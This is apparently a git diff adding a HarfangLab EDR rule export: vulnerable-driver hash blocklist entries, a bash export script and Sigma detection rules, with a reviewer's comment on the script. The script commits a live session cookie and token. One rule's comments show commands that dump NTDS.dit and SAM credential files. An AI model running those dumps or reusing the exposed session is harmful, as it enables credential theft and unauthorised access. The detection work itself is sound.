+ "type": "hash", + "value": "fa4be68f1ea1e36aca95fd62b6727cf9d22886c2612391faeb9c56a1c62c2ec9", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff9b03e0-9bd2-5400-9c63-47c3f3ef8f19", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492196Z", + "creation_date": "2026-03-23T11:45:31.492198Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492204Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a832a08b2b26733b0b4263f27457ca0b8ab9c7451eb082957ea54f5404dc6ac8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ff9b7e8a-404e-56ea-adb3-b4e32c5d6c99", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980918Z", + "creation_date": "2026-03-23T11:45:29.980919Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980925Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b7bba82777c9912e6a728c3e873c5a8fd3546982e0d5fa88e64b3e2122f9bc3b", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ffa30052-3e61-5e4f-90c3-9f19529f6670", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479811Z", + "creation_date": "2026-03-23T11:45:30.479812Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479818Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c2562e0101cb39906c73b96fc15a6e6e3edd710b19858f6bbd0c90f1561b6038", + "comment": "Vulnerable Kernel Driver (aka capcom.sys) [https://www.loldrivers.io/drivers/b51c441a-12c7-407d-9517-559cc0030cf6/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ffa6b26f-4ad2-54b9-9195-4e207ad7783b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825664Z", + "creation_date": "2026-03-23T11:45:31.825666Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825671Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cb80778406fd8002b361bbcba3b20a36c36994c3c3f0de80bf83f566cf5f897b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ffab4dd8-97ec-58a1-8226-d235b0be3186", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146259Z", + "creation_date": "2026-03-23T11:45:31.146261Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146267Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f77cb6e917aa001b995d40e33368e33ac666b1ac0523cf7c8a1f86bb95948fb3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ffc01bb1-7d0b-5e60-8d34-39cf0f99ecc5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611096Z", + "creation_date": "2026-03-23T11:45:29.611098Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611103Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3e423caaff9002b38e1d90005df181aa2b3711ebbf6d1eb83941656ccc313811", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ffce4a39-7dcb-5f7d-8bc8-a767df6c5eda", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460920Z", + "creation_date": "2026-03-23T11:45:30.460923Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460933Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a6c05b10a5c090b743a61fa225b09e390e2dd2bd6cb4fd96b987f1e0d3f2124a", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ffe0b548-ab82-55ae-981e-2371fa2228b6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614523Z", + "creation_date": "2026-03-23T11:45:29.614525Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614531Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": 
null, + "references": [], + "type": "hash", + "value": "3d9e83b189fcf5c3541c62d1f54a0da0a4e5b62c3243d2989afc46644056c8e3", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ffecf71a-e24b-5d1a-9ee6-20cec15f1657", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490155Z", + "creation_date": "2026-03-23T11:45:31.490157Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490163Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2580bdb0cc7653417276370992f103a0b1c8a38642eedd0feebd4c1f80aec21a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fffac2a2-4dcb-550d-b78f-019c96dbeac6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836244Z", + "creation_date": "2026-03-23T11:45:30.836246Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836252Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e0d154893940c8abe95477321fcc006636423d9584baa76007013eeb7de56881", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fffb5883-28f0-5309-ae4d-701c30284f96", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832835Z", + "creation_date": "2026-03-23T11:45:30.832838Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832847Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c2dd7461a636a4b507e5aff3cbe8c54545a9c497ca45299e4ba69e34866b37d1", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
diff --git a/harfang_export/export.sh b/harfang_export/export.sh
new file mode 100644
index 0000000..74b9379
--- /dev/null
+++ b/harfang_export/export.sh
@@ -0,0 +1,40 @@
+#!/bin/bash
+
+BASE_URL="https://2ee66321e45741fa.hurukai.io:8443"
+COOKIE="hlab_token=a0fdeaebc1de7a5a7e27ee39bffe684f99270280; hlab_front=\"\"; sessionid=gp9c7k3j67gjdwy3q41ai1z0jsbxjc1v"
+limit=50
+offset=0
+total=0
+
+while true; do
+ echo "Fetching offset=$offset..."
+
+ response=$(curl -s -X GET \
+ "$BASE_URL/api/data/threat_intelligence/CorrelationRule/?limit=$limit&offset=$offset" \
+ -H "accept: application/json" \
+ -H "Cookie: $COOKIE")
+
+ # Vérifie si la réponse est valide
+ count=$(echo "$response" | jq -r '.count')
+ if [ "$count" == "null" ] || [ -z "$count" ]; then
+ echo "Erreur ou réponse invalide :"
+ echo "$response" | head -c 500
+ break
+ fi
+
+ echo "Total disponible : $count"
+
+ # Sauvegarde les résultats
+ echo "$response" | jq '.results[]' >> resultats.json
+
+ total=$((total + $(echo "$response" | jq '.results | length')))
+ echo "Récupérés jusqu'ici : $total"
+
+ next=$(echo "$response" | jq -r '.next')
+ if [ "$next" == "null" ]; then
+ echo "Terminé ! $total résultats récupérés."
+ break
+ fi
+
+ offset=$((offset + limit))
+done
diff --git a/harfang_export/sigma_export.json b/harfang_export/sigma_export.json
new file mode 100644
index 0000000..4bb745e
--- /dev/null
+++ b/harfang_export/sigma_export.json
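Review bot: The `COOKIE=` line commits a live `hlab_token` and `sessionid` for the tenant at `BASE_URL`, so anyone with read access to this repository holds that HarfangLab session until it expires; the exposed session should be invalidated on the server side and the script should take the credential from the environment instead, e.g. `COOKIE="${HLAB_COOKIE:?HLAB_COOKIE is not set}"` (constructed variable name). `curl -s` without `--fail` returns an HTML or empty body on 401/403/5xx, and the `count` null-check then prints the body and breaks out of the loop with a zero exit status, so an expired session looks like a successful empty run; `set -euo pipefail` at the top and `curl -sS --fail` would make that fail loudly. `jq '.results[]' >> resultats.json` appends pretty-printed objects across runs, which duplicates records on a re-run and produces the concatenated-object layout seen in the exported `.json` files rather than a single document or NDJSON; `jq -c '.results[]'` into a file truncated once before the loop gives one record per line. The loop also reads `.next` only to test for `null` and advances by `offset` on its own; following the `.next` URL keeps pagination consistent with what the server returns.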
@@ -0,0 +1,131774 @@ +{ + "id": "003481a2-e45e-44fd-9433-b13492669c31", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.076504Z", + "creation_date": "2026-03-23T11:45:34.076506Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.076511Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/t1174-password-filter-dll", + "https://attack.mitre.org/techniques/T1547/002/" + ], + "name": "t1547_002_persistence_lsa_authentication_package.yml", + "content": "title: LSA Authentication Package Installed\nid: 003481a2-e45e-44fd-9433-b13492669c31\ndescription: |\n Detects the installation of a new authentication package via a registry modification.\n The LSA (Local Security Authority) is a critical Windows component responsible for managing security policies and authentication.\n Attackers may install these packages to gain elevated privileges or establish persistence.\n It is recommended to investigate the source of the configuration change, review the permissions and ownership of the affected LSA settings, and verify the legitimacy of the modification.\n 
If the change cannot be attributed to a legitimate process, consider rolling back the configuration.\nreferences:\n - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/t1174-password-filter-dll\n - https://attack.mitre.org/techniques/T1547/002/\ndate: 2020/09/22\nmodified: 2025/05/05\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n TargetObject:\n - 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Authentication Packages'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Authentication Packages'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_malwarebytes:\n Image: '?:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe'\n\n exclusion_scecli:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Authentication Packages'\n Details: 'scecli'\n\n exclusion_msv10:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Authentication Packages'\n Details: 'msv1_0' # default value\n\n exclusion_known_fp:\n Details:\n - 'msv1_0'\n - 'msv1_0;sshdpinauthlsa' # C:\\WINDOWS\\system32\\SshdPinAuthLsa.dll, DLL from microsoft\n - 'msv1_0;ZenV1_0' # Novell ZENworks\n - 'msv1_0;nxlsa' # NoMachine S.a.r.l.\n - 'msv1_0;BvLsaEx' # BvSshServer-Inst.exe\n - 'msv1_0;teleport' # teleport-windows-auth-setup - Teleport RMM - https://goteleport.com/download/?product=connect&os=windows\n - 'msv1_0;CSALsubauth' # https://www.authlite.com/\n - 'msv1_0;wvauth' # Wave Systems Corp.\n - 'msv1_0;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n - 
'msv1_0;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n - 'msv1_0;SshdPinAuthLsa;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n - 'msv1_0;SshdPinAuthLsa;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "003481a2-e45e-44fd-9433-b13492669c31", + "rule_name": "LSA Authentication Package Installed", + "rule_description": "Detects the installation of a new authentication package via a registry modification.\nThe LSA (Local Security Authority) is a critical Windows component responsible for managing security policies and authentication.\nAttackers may install these packages to gain elevated privileges or establish persistence.\nIt is recommended to investigate the source of the configuration change, review the permissions and ownership of the affected LSA settings, and verify the legitimacy of the modification.\nIf the change cannot be attributed to a legitimate process, consider rolling back the configuration.\n", + "rule_creation_date": "2020-09-22", + "rule_modified_date": "2025-05-05", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1112", + "attack.t1547.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "006ebafe-6e79-4642-a76f-5073a4cc1bc5", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.098649Z", + "creation_date": "2026-03-23T11:45:34.098651Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.098656Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_dnscacheugc.yml", + "content": "title: DLL Hijacking via dnscacheugc.exe\nid: 006ebafe-6e79-4642-a76f-5073a4cc1bc5\ndescription: |\n Detects potential Windows DLL Hijacking via dnscacheugc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any 
suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dnscacheugc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\IPHLPAPI.DLL'\n - '\\wdscore.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "006ebafe-6e79-4642-a76f-5073a4cc1bc5", + "rule_name": "DLL Hijacking via dnscacheugc.exe", + "rule_description": "Detects potential Windows DLL Hijacking via dnscacheugc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of 
the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "0070bcf5-0b6e-40f9-9b07-baad4a18cf84", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.627344Z", + "creation_date": "2026-03-23T11:45:34.627346Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.627350Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/jschicht/RawCopy", + "http://blog.opensecurityresearch.com/2011/10/how-to-acquire-locked-files-from.html", + "https://attack.mitre.org/techniques/T1006/" + ], + "name": "t1006_raw_access_files.yml", + "content": "title: Files Accessed via Raw Device Access\nid: 0070bcf5-0b6e-40f9-9b07-baad4a18cf84\ndescription: |\n Detects raw access to files through tools like RawCopy or FGET.\n 
Attackers can raw access files to dump them and evade detection mechanisms, as well as bypass locked files.\n It is recommended to investigate the command-line arguments to check which file was accessed and to analyze the parent process for suspicious activities.\nreferences:\n - https://github.com/jschicht/RawCopy\n - http://blog.opensecurityresearch.com/2011/10/how-to-acquire-locked-files-from.html\n - https://attack.mitre.org/techniques/T1006/\ndate: 2022/10/19\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.RawCopy\n - classification.Windows.Tool.FGET\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # RawCopy.exe /FileNamePath:C:\\Windows\\NTDS\\ntds.dit /OutputPath:C:\\Windows\\Temp\\ntds.dit\n selection_rawcopy:\n LegalCopyright: 'Joakim Schicht'\n Description: 'Copy files from NTFS volumes by using low level disk access'\n CommandLine|contains: 'FileNamePath'\n\n # FGET.exe -extract C:\\Windows\\System32\\config\\SAM C:\\Windows\\Temp\\out.sam\n selection_fget:\n # Signed by HBGary, Inc\n # The certificate was explicitly revoked by its issuer\n Imphash: '72B17395940FD0266D2CBBF8EB32CF3C'\n CommandLine|contains: 'extract'\n\n # This is handled by the rule aaf113bc-6b63-46d3-919a-9b2a105bcd5f\n filter_sensitive_files:\n CommandLine|contains:\n - '\\Windows\\NTDS\\NTDS.dit'\n - '\\Windows\\System32\\config\\SAM'\n - '\\Windows\\System32\\config\\SECURITY'\n - '\\Windows\\System32\\config\\SYSTEM'\n\n exclusion_bmc:\n Ancestors|endswith: '?:\\Program Files\\BMC Software\\BladeLogic\\RSC\\RSCDsvc.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + 
